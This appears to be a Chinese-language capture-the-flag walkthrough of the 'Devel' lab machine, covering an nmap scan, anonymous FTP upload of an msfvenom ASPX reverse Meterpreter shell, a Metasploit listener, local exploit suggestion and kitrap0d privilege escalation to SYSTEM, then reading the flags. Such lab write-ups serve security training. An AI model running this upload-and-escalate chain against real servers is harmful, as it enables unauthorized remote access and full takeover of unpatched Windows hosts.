Devel 练习记录

环境介绍：

名称：Devel

信息搜集

获取目标

1
2
3
4
5
6


$ nmap -sV -O -F -oA Legacy --version-light 10.10.10.5
Nmap scan report for 10.10.10.5
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5     
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%)

这里可以看出80和21开放且可以访问，试了下FTP可以匿名登录。

shell

生成

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o icekam.aspx LHOST=tun0 LPORT=6664

上传

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

ftp> put icekam.aspx
local: icekam.aspx remote: icekam.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2831 bytes sent in 0.00 secs (34.1753 MB/s)
ftp> 

提权

监听

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35


msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     6664             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST tun0
msf5 exploit(multi/handler) > set LPORT 6664
LPORT => 6664
msf5 exploit(multi/handler) > run 

$ wget http://10.10.10.5/icekam.aspx

meterpreter > 

本地漏洞枚举

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31


meterpreter > background

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set SESSION 3 
SESSION => 3
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

提权


msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d

msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 3 
SESSION => 3

msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit 
[*] Started reverse TCP handler on 10.10.14.2:6664 
[*] Launching notepad to host the exploit...
[+] Process 3228 launched.

flag

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92


cd c:\

c:\>whoami
whoami
nt authority\system

c:\>

c:\>cd Users	
cd Users

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users

18/03/2017  01:16 ��    <DIR>          .
18/03/2017  01:16 ��    <DIR>          ..
18/03/2017  01:16 ��    <DIR>          Administrator
17/03/2017  04:17 ��    <DIR>          babis
18/03/2017  01:06 ��    <DIR>          Classic .NET AppPool
14/07/2009  09:20 ��    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  24.471.080.960 bytes free

c:\Users>cd babis
cd babis

c:\Users\babis>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis

17/03/2017  04:17 ��    <DIR>          .
17/03/2017  04:17 ��    <DIR>          ..
17/03/2017  04:17 ��    <DIR>          Contacts
18/03/2017  01:14 ��    <DIR>          Desktop
17/03/2017  04:17 ��    <DIR>          Documents
17/03/2017  04:17 ��    <DIR>          Downloads
17/03/2017  04:17 ��    <DIR>          Favorites
17/03/2017  04:17 ��    <DIR>          Links
17/03/2017  04:17 ��    <DIR>          Music
17/03/2017  04:17 ��    <DIR>          Pictures
17/03/2017  04:17 ��    <DIR>          Saved Games
17/03/2017  04:17 ��    <DIR>          Searches
17/03/2017  04:17 ��    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  24.471.080.960 bytes free

c:\Users\babis>cd Desktop
cd Desktop

c:\Users\babis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis\Desktop

18/03/2017  01:14 ��    <DIR>          .
18/03/2017  01:14 ��    <DIR>          ..
18/03/2017  01:18 ��                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.471.080.960 bytes free

c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
c:\Users\babis\Desktop>cd c:\Users\Administrator\Desktop    
cd c:\Users\Administrator\Desktop

c:\Users\Administrator\Desktop>dir 
dir 
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator\Desktop

18/03/2017  01:17 ��    <DIR>          .
18/03/2017  01:17 ��    <DIR>          ..
18/03/2017  01:17 ��                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.471.080.960 bytes free

c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0b5041708797c4fc4728bc72b4b
c:\Users\Administrator\Desktop>

心得

这个环境主要本地漏洞枚举能力，练习下msf使用。

Devel 练习记录

环境介绍：

信息搜集

获取目标

shell

生成

上传

提权

监听

本地漏洞枚举

提权

flag

心得

相关内容